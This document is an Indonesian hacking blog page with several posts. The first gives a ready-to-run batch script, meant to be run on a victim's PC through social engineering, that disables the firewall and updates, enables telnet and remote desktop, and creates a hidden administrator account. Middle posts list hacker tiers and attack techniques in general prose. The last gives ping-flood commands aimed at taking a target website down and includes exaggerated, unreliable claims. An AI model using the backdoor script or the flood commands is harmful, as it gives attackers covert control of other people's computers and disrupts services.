Tampilkan postingan dengan label Command Prompt. Tampilkan semua postingan
Tampilkan postingan dengan label Command Prompt. Tampilkan semua postingan

Rabu, 09 Maret 2016

Script Instan Remote Dekstop Protokol

Cara remote komputer orang lain dengan cmd mungkin membutuhkan beberapa kode cmd dengan cara step by step,tapi kali ini saya akan share script instan rdp tinggal run saja tanpa repot setting ganti admin user dan lain-lain.Script ini memang agak berbahaya karena bisa mematikan firewall dan add administrator baru di komputer lain.memang tujuan dari script ini untuk kegiatan hacking komputer atau laptop orang lain.Jika beda atau tidak dalam satu jaringan seperti jaringan LAN atau Wifi harus mempunyai server sendiri untuk remote dan sebagai host server.Gunakanlah layanan hosting server atau vps gratis bisa dicari di google search.

Langsung saja tulis scriptnya atau bisa copy paste di notepad
1.pertama buka dulu notepad dengan cara Run>notepad>enter atau tekan tombol windows +R>Notepad>enter.
2.
@echo off

REM ****************
REM Disable off "AUTO UPDATE"
REM ****************
sc config wuauserv start= disabled
net stop wuauserv

REM ****************
REM Disable windows xp Firewall
REM ****************
netsh firewall set opmode disable

REM ****************
REM Enable TELNET
REM ****************
sc config tlntsvr start= auto
net start telnet

REM ****************
REM Enable Remote Desktop
REM ****************
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

REM ***************
REM Create a HIDDEN USER usr= hack007, pass= dani
REM ***************
net user hacker007 dani /add
net localgroup "Administrators" /add hacker007
net localgroup "Users" /del hacker007
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker007 /t REG_DWORD /d 0 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f

3.Simpan dengan extensi .Bat contoh RDP.BAT    >(gunakan teknik sosial engginering)
hack pc

4.file harus dijalankan atau Run di komputer orang lain(target)

5.id password bisa diganti dengan versi kamu sendiri...digunakan untuk login di windows

6.ingat scrip diatas hanya untuk dalam satu jaringan saja misalnya LAN/hotspot WIFI

Tolong gunakanlah dengan bijak,dan baca artikel lainnya di blog ini.jika berhasil anda mempunyai hak full akses di komputer target.anda bisa lihat apa yang ada di folder/menghapus foldel dll.Seperti anda yang mempunyai pc/laptop tersebut.
terima kasih sudah berkunjung

Jumat, 29 Januari 2016

Penjelasan Lengkap Tentang Tingkatan Seorang Hacker

Banyak orang diluar sana yang memilki kemampuan dalam menggunakan komputer dengan basis sistem operasi mereka masing-masing.Seperti System operasi dari microsoft windows,Linux,Pyton,Macintosh.Unix,Novell.Paling umum digunakan oleh orang adalah dari Microsoft yaitu OS Windows dan basic sistem operasi adalah DOS/MS DOS,sistem operasi dasar yang dibeli oleh Bill Gates dari perusahaan komputer dan dikembangkan olehnya dengan Nama perusahaan Micro-soft atau sekarang lebih dikenal dengan Microsoft tanpa menggunakan spasi.Jika anda membuka Command Prompt itu adalah sistem dasar dari komputer.
Ada hal yang mengejutkan dalam dunia hacking dan progaming Mulai dari anak umur 8 tahun yang sudah bisa membuat progam game android dan seorang hacker asal indonesia yang telah berhasil meretas Satelit,Ini meretas satelit langsung bukan meretas komputer maupun server.Dalam berita yang pernah disiarkan dia Bisa mengubah jalur satelit sesuka hati maupun membaca data dari satelit tersebut.Beritanya cukup heboh diluar maupun didalam negeri.

Hacker sendiri pun memiliki tingkatan masing-masing untuk membedakan kemampuan dan pengetahuan mereka dalam kegiatan pemrograman maupun kegitan hacking.
Berikut ini adalah Tingkatan seorang hacker dalam aktivitasnya :

1.Elite

Seorang Elite Juga dikenal sebagai code 3l33t, 3l337, 31337 atau kombinasi lebih dari itu,Elite merupakan ujung tombak industri keamanan jaringan. Mereka memahami sistem operasi dari sisi luar dalam, sanggup mengkonfigurasi dan menyambungkan jaringan secara global dan terarah. Sanggup melakukan pemrograman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya efisien dan terampil, menggunakan pengetahuannya dengan tepat. Mereka seperti siluman yang dapat memasuki sistem tanpa terdeteksi, walaupun mereka tidak akan menghancurkan data-data yang ditemui. Karena mereka selalu mengikuti peraturan yang ada.Sering melakukan test untuk menemukan bug terhadap suatu sistem maupun website besar untuk dilaporkan ke admin untuk memperbaiki bug tersebut.
Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti peraturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu’.
tingkatan seorang hacker

2.Semi Elite

Hacker ini umumnya lebih muda daripada tingkatan Elite. Mereka juga mempunyai kemampuan dan pengetahuan luas tentang komputer. Mereka mengerti tentang bagaimana sistem operasi bekerja,termasuk lubangnya (vulnerability). Biasanya dilengkapi dengan sejumlah kecil program yang cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh hacker tingkat ini. Sialnya oleh para Elite mereka sering kali dikategorikan sebagai Lamer.
Ciri-ciri : lebih muda dari golongan elite,mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi komputer, kemampuan programnya cukup untuk mengubah program eksploit.

3.Developed Kiddie

Sebutan ini cocok terutama karena umur kelompok ini masih muda (ABG) dan masih sekolah. Mereka membaca tentang metode hacking dan caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil dan memproklamasikan kemenangan ke peretas lainnya. Umumnya mereka masih menggunakan Grafic User Interface (GUI) dan baru belajar hal dasar dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.
Ciri-ciri : umurnya masih muda & masih sekolah, mereka membaca tentang metode hacking & caranya di berbagai kesempatan, mencoba berbagai sistem sampai akhirnya berhasil & memamerkan kemenangan ke lainnya, umumnya masih menggunakan Grafik User Interface & baru belajar basic dari UNIX tanpa mampu menemukan kelemahan baru di sistem operasi.

4.Script Kiddie

Seperti developed kiddie, Script Kiddie biasanya melakukan aktivitas di atas. Seperti juga Lamers, mereka hanya mempunyai pengetahuan tentang teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti dan menyusahkan hidup pengguna Internet.
Ciri-ciri :mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti pengguna komputer lain.

5.Lamer

Mereka adalah orang tanpa pengalaman dan pengetahuan yang ingin menjadi hacker (wanna be hacker). Mereka biasanya membaca atau mendengar tentang hacker dan ingin menjadi seperti mereka. Penggunaan komputer mereka hanyalah untuk main game, IRC, tukar-menukar perangkat lunak bajakan dan mencuri kartu kredit(carding). Melakukan hacking menggunakan perangkat lunak trojan, nuke, dan DoS. Biasanya menyombongkan diri melalui IRC channel. Karena banyak kekurangan untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai tingkat developed kiddie atau script kiddie saja.

Saya menulis article ini bukan berarti saya seorang hacker tapi saya hanya seorang yang menyukai hal-hal tentang sains dan teknologi.Karena hal tersebut sangat menarik dan selalu ada hal baru setiap waktu.Perkembangan teknologi saja terus meningkat pesat dalam kurun waktu 100 tahun terakhir dan terus berkembang,contoh perkembangan teknologi handphone ataupun komputer yang semakin banyak fitur dan semakin simple desain ataupun bentuk yang menarik.
Terima kasih telah berkunjung ,sempatkan berkomentar dan share article ini.

Penjelasan Lengkap Tentang Macam macam Teknik Hacking

Bermula dari Komputer IBM yaitu pc jadul yang hanya memiliki beberapa fitur saja dan sekarang komputerpun mulai berkembang sangat pesat dari teknologi,desain,fitur,sistem operasinya juga semakin bervariasi.Kata Hacker juga semakin terkenal yaitu seorang yang bisa meretas suatu system atau Hacker adalah seseorang dimana dia menciptakan sesuatu yang berhubungan dengan bahasa pemograman dan memproteksi dari tindakan yang tidak sah dari pembajakan.
cmd hacking

Biasanya mereka mempunyai kode etik dimana tidak akan saling merusak dari sesuatu Pemrograman yang masih baru, kecuali jika program tersebut sudah mati atau tidak digunakan Lagi.

Mereka akan saling mengingatkan bila pemograman yang diciptakan mengalami bug atau terdapat celah-celah yang tentunya peringatan mereka tidak diketahui oleh orang umum.Nah itu bisa disebut white hacker tapi ada juga black hacker yang suka mencari sensasi atau tantangan untuk kepentingan dan kesenangan sendiri,Tipe ini bersifat merugikan orang lain karena perbuatan keisengan mereka.

Kali ini kita akan membahas apa saja teknik dan metode hacking itu !
Simak Penjelasan dibawah ini :

Macam-macam teknik hacking dibawah ini adalah teknik Yang pernah digunakan oleh para Hacker:

1.Pertama yang paling umum yaitu IP Spoofing

IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host dari dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya(jaringannya) misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data tersebut. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.

2. FTP Attack

Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service(DOS). Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang. Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dihack. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya buffer over flow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack (menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mengidentify informasi yang berada dalam sistem.

3. Unix Finger Exploits

Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minimum, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan atau mendapatkan informasi tentang footprinting, termasuk nama login aksses dan informasi contact. Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.

4. Flooding & Broadcasting

Seorang attacker bisa mengurangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam suatu network serangan ini dinamakan broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah. Serangan dengan cara Flooding bergantung kepada dua faktor umum yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan(server down): terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.

5. Fragmented Packet Attacks

Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( Head) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol.

6. E-mail Exploits

Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi target secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).

7. DNS and BIND Vulnerabilities

Berita baru-baru ini tentang kerentanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).

8. Password Attacks

Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko terjadinya kehilangan password, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing.

9.Proxy Server Attacks

Salah satu fungsi Proxy server adalah untuk mempercepat waktu response packet dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, setiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.

10. Remote Command Processing Attacks

Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan dilain system (dalam network). Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerentanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan untuk mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.

11. Remote File System Attack

Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file.

12. Selective Program Insertions

Selective Program Insertions adalah serangan yang dilakukan ketika attacker memberi program-program penghancur, seperti virus worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak ke dalam system, pemusnahan file, pencurian password sampai dengan akses backdoor.

13. Port Scanning

Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebagai contoh saja, scaning yang bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet

Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengakses suatu network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metode ini mempunyai lebih banyak kualitas stealth-like(transparant)

15. HTTPD Attacks

Kerentanan yang terdapat dalam HTTPD maupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.
HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker akses ke command prompt (cmd).

16. Remote File Inclusion (RFI)
Metode yang memanfaatkan kelemahan script PHP include(), include_once(), require(), require_once() yang variabel nya tidak diungkapkan dengan sempurna. Dengan RFI seorang attacker dapat menginclude kan file yang berada di luar server yang bersangkutan.


17. Local File Inclusion (LFI)
Metode yang memanfaatkan kelemahan script PHP include(), include_once(), require(), require_once() yang variabel nya tidak dideklarasikan dengan sempurna. Dengan LFI seorang attacker dapat menginclude kan file yang berada di dalam server yang bersangkutan.

18. SQL injection
SQL injection adalah teknik yang memanfaatkan kesalahan penulisan query SQL pada suatu website sehingga seorang hacker bisa menginsert beberapa SQL statement ke ‘query’ dengan cara memanipulasi data input ke aplikasi tersebut. sql injection merupakan teknik lawas namun paling banyak digunakan oleh para dedemit maya.


19. Cross Site Scripting (XSS)
XSS dikenal juga dengan CSS adalah singkatan dari Cross Site Scripting. XSS adalah suatu metode memasukan code atau script HTML kedalam suatu website yang dijalankan melalui browser di client.

Ada juga Tehnik lain yang digunakan untuk kegiatan hacking,yang mengandalkan kemampuan pengguna untuk memanipulasi seseorang(sosial engineering) ataupun merusak(exploit),merubah,mengedit suatu system inti.
Berikut ini adalah contoh lain dari teknik yang digunakan oleh hacker :

1. Soscial Engineering
     Cara trick ini untuk memanipulasi target dengan media sosial,email,telephone,sms, dll. mengkonsentrasikan diri pada rantai terlemah sistem jaringan komputer, yaitu manusia. Cara ini telah dikenal sejak lama dan yang paling mudah untuk dilakukan para hacker untuk memperoleh informasi tentang targetnya, dengan cara meminta informasi tersebut kepada korban atau pihak lain yang mempunyai informasi itu

2. Phising
     Tindakan menipu dengan cara menyamar atau memalsukan yang asli. biasanya dengan media email, instant messenger dan website palsu

3. Sniffing
     Cara trik mengendus dan menyadap informasi pada jaringan komputer wireless maupun kabel dengan memakai software seperti cain able, aircrack, snort, nmap.

4. Keylogger Tools
     Hampir sama dengan tindakan snifing namun sumber penyadapan langsung dari ketikan yang tejadi pada aktivitas keyboard. Biasanya hacker memasangnya pada akses internet umum, seperti di warnet dan lain-lain. Hasil penyadapan berupa file login ataupun catatan yang dapat tersimpan di hardisk maupun langsung terkirim ke email hacker.ada yang sorfware maupun hardware.

5. Brute Force
     Tindakan ini merupakan serangan langsung yang dilakukan hacker ke website profil korban, dengan software berbasis pemprograman php yang di upload ke sebuahweb hosting yang kemudian dijalankan oleh hacker dari sana dan memakai kamus bahasa untuk menembak password account korban.

6. Facebook Application
     Triknya hacker dapat mengakses data-data penting komputer anda ketika anda memasang aplikasi tersebut di profil.

7. Exploits Vulnerability
     Ini adalah teknik hacking yang selalu update, yaitu dengan mencari kelemahan dari sistem website, misalnya infrastruktur jaringan atau operating system, database atau script programingnya untuk mengetahui share update kelemahan apa saja yang terdapat pada site tersebut.

8. Plagiat
     Ini adalah trik hacking dengan cara meminta ID dan password dengan cara para hacker mengatasnamakan developer, master, admin dan lain-lain pada website game dan sebagainya. Sebagai contoh pada facebook.com banyak user yang menggunakan nama-nama orang besar(terkenal).

9. DoS (Denial Of  Service) 
Serangan DoS (denial of service attacks) adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut. Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:
- Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
- Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
- Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.
      Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara gratis), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop. Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat. Beberapa contoh Serangan DoS lainnya adalah: Serangan Buffer Overflow, mengirimkan data yang melebihi kapasitas sistem, misalnya paket ICMP yang berukuran sangat besar. Serangan SYN, mengirimkan data TCP SYN dengan alamat palsu. Serangan Teardrop, mengirimkan paket IP dengan nilai offsetyang membingungkan. Serangan Smurf, mengirimkan paket ICMP bervolume besar dengan alamat host lain(ICMP Flooding)

10.Deface
 Bagian dari kegiatan hacking web atau program application, yang menfokuskan target operasi pada perubahan tampilan dan konfigurasi fisik dari web atau program aplikasi tanpa melalui source code program tersebut. Sedangkan deface itu sendiri adalah hasil akhir dari kegiatan cracking. Tekniknya adalah dengan membaca source codenya, terus mengganti image dan editing html tag. Serangan dengan tujuan utama merubah tampilah sebuah website, baik halaman utama maupun halaman lain terkait dengannya, diistilahkan sebagai “Web Defacement”. Hal ini biasa dilakukan oleh para “attacker” atau penyerang karena merasa tidak puas atau tidak suka kepada individu, kelompok, atau komunitas tertentu sehingga website yang terkait dengannya menjadi sasaran utama.

 11.Firewall
 Suatu cara/sistem/mekanisme yang diterapkan baik terhadap hardware , software ataupun sistem itu sendiri dengan tujuan untuk melindungi, baik dengan menyaring, membatasi atau bahkan menolak suatu atau semua hubungan/kegiatan suatu segmen pada jaringan pribadi dengan jaringan luar yang bukan merupakan ruang lingkupnya. Segmen tersebut dapat merupakan sebuah workstation, server, router, atau local area network (LAN) anda.

 12.Routing
 Routing adalah proses untuk memilih jalur (path) yang harus dilalui oleh paket. Jalur yang baik tergantung pada beban jaringan, panjang datagram, type of service requested dan pola trafik. Pada umumnya skema routing hanya mempertimbangkan jalur terpendek (the shortest path).
hacker attack

 Semua tindakan hacking di atas adalah teknik hacking yang sering digunakan oleh hacker untuk membobol password admin website, akun profil, maupun pencurian ID game yang dapat mendatangkan banyak uang. Tulisan di atas mengenai teknik hacking yang sering digunakan oleh hacker dalam mencuri akun hanyalah unutk pengetahuan bukan untuk melakukan kejahatan cyber. Jika anda mencoba untuk mempelajari, harap hati-hati dengan file di internet yang disebutkan sebagai software gratis hacking namun itu adalah virus komputer yang sangat berbahaya,terkadang ada juga anti virus yang tidak dapat mendekteksinya.
Jika ada pertanyaan silahkan komentar dan jangan lupa share article ini.
Semoga article ini bisa menambah pengetahuan anda
Terima kasih telah berkunjung

Sabtu, 16 Januari 2016

2 Cara Pengertian Ddos Website Dengan Cmd

DDoS dengan Command Prompt
Pengertian apa itu DDOS adalah singkatan dari Denial Distribute of services.Ddos ialah serangan untuk melumpuhkan suatu server host yang di lakukan untuk membuat server down dan efeknya server bisa lumpuh,eror,maupun tidak bisa dibuka.Memang terlihat biasa saja tapi sangat merugikan bagi yang terkena serangan ini.
Situs-situs besar seperti yahoo.com , ebay.com , hotmail.com, e-gold.com , 2checkout.com dan lain-lain pernah mengalami serangan yang mengakibatkan situs nya tidak bisa di akses selama beberapa jam.
Yang terbaru adalah situs e-gold.com pada tahun 2005 kemarin, situs nya di serang dengan memakai metode DDOS ( Denial Distribute of services ),yang dilakukan oleh peretas.

Bagaimana cara kerja DDOS ?
Jika Anda memakai program windows , coba lakukan ini di komputer Anda.
cmd ddos

Cara satu
1.klik Start >Programs > Accessories > Command Prompt
atau bisa lewat start>Run>Ketik Cmd>enter
2. Kemudian di Command prompt ketikan , Ping -t www.situstarget.com  enter,untuk melakukan ping ke situs tersebut.
Cara kedua
1.Ketikan di cmd ping -l 50000 situstarget.com -t  enter
-l adalah L kecil.
50000 adalah besar bandwith yang dikirim
dengan cara ini kamu akan mengirim daya bytes dalam jumlah besar yaitu 50000 dan dikirim ke alamat web target.
Cara Ketiga
1.Ketikan di cmd Tracert situstarget.com  Enter
dengan tiga cara di atas dengan membuka tiga command prompt dan mulai dengan code perintah masing-masing cukup untuk membuat suatu website down.
Hal ini untuk pengetahuan saja bukan untuk di praktekkan.

Kemudian komputer Anda akan mengirimkan paket informasi ke situs yang di tuju tadi, pada dasarnya dengan perintah tersebut komputer Anda mengirimkan ucapan "Halo , apa ada orang di situ ? " , ke situs yang di tuju tadi. kemudian server situs yang di tuju tadi mengirimkan jawaban balik dengan mengatakan : "ya, di sini ada orang"

Sekarang bayangkanlah, jika ada ribuan komputer, dalam waktu bersamaan melakukan perintah tersebut di situs yang di tuju. 1 komputer mengirimkan data sebesar 32 bytes / detik ke situs yang di tuju. Jika ada 10.000 komputer yang melakukan perintah tersebut secara bersamaan, itu artinya ada kiriman data sebesar 312 Mega Bytes/ detik yang di terima oleh situs yang di tuju tadi.

Dan server dari situs yang di tuju tadi pun harus merespon kiriman yang di kirim dari 10.000 komputer secara bersamaan. Jika 312 MB/ detik data yang harus di proses oleh server, dalam 1 menit saja, server harus memproses kiriman data sebesar 312 MB x 60 detik = 18720 MB. Bisa di tebak, situs yang di serang dengan metode ini akan mengalami Over Load / kelebihan data, dan tidak sanggup memproses kiriman data yang datang.

Pertanyaan nya adalah bagaimana 10.000 komputer tersebut bisa ikut melakukan serangan ?

Komputer-komputer lain yang ikut melakukan serangan tersebut di sebut komputer zombie, dimana sudah terinfeksi semacam adware. jadi si Penyerang hanya memerintahkan komputer utamanya untuk mengirimkan perintah ke komputer zombie yang sudah terinfeksi agar melakukan Ping ke situs yang di tuju. Oleh karena itu pentingnya ada firewall di komputer anda, untuk memonitor paket yang keluar maupun yang masuk dari komputer anda.
Jika anda belum memiliki firewall bisa coba zone alarm,
Adware(virus iklan merugikan) biasanya di dapat dari program-program gratisan yang anda download, untuk itu juga harus berhati-hati mendownload program gratisan.
Bagaimana jika ada situs lain yang mengklaim situsnya sedang di serang , bagaimana kita tahu itu benar atau bohong ?
Bisa kita lakukan analisa untuk mendeteksi benar atau tidaknya serangan tersebut terjadi, atau hanya mengaku-ngaku saja.
Jika anda berkecimpung di dunia Investment semacam HYIP, autosurf , atau pun situs investasi lainnya.

biasanya sering yang anda jumpai ada situs yang adminnya bilang situsnya sedang di serang pakai metode DDOS, dan terpaksa harus menutup situs nya, ujung-ujungnya yah admin tersebut melakukan SCAM/penipuan dan tidak membayar membernya.

Berikut tahap-tahap melakukan analisa benar atau tidaknya situs tersebut di serang.

1. Beri Nilai kemampuan finansial dari situs investasi tersebut.

- Sekarang ini sudah banyak jasa penyedia ANTI DDOS , biaya nya pun cukup mahal yakni berkisar $600 / bulan sampai dengan $1000 / bulan.

sekarang anda nilai situs tersebut, apakah mampu membayar jasa tersebut atau tidak. Jika bisnis nya bernilai ratusan ribu dollar , masak sih tidak mau ngeluarin uang $600 / bulan untuk mengamankan situs nya ? Sering anda lihat kan , ada situs investasi yang menulis :

Total investasi : sekian ratus ribu dollar
Total Withdrawal : sekian ratus ribu dollar

Jika benar uangnya sebanyak itu, tentu tidak ragu untuk membayar services ANTI DDOS sebesar $600 / bulan.


2. Periksa kebenaran.

Jika situs tersebut mengklaim mereka memiliki dan menyewa services ANTI DDOS, tanyakan di mana mereka menyewanya . biasanya di situs penyedia layanan ANTI DDOS di tulis nama-nama client yang menggunakan atau memakai services mereka.

3. Periksa hostingnya, apakah menggunakan satu private IP address, atau shared IP address.

Private IP address artinya = 1 nomor IP untuk 1 domain
Shared IP address artinya = 1 nomor IP untuk BANYAK DOMAIN.

sebagai contoh :
situs semuabisnis.com menggunakan shared IP address. IP untuk domain semuabisnis.com adalah http://75.126.30.10/ dan ada sekitar 14 domain / situs yang menggunakan IP ini , salah satunya adalah ambri-servers.com

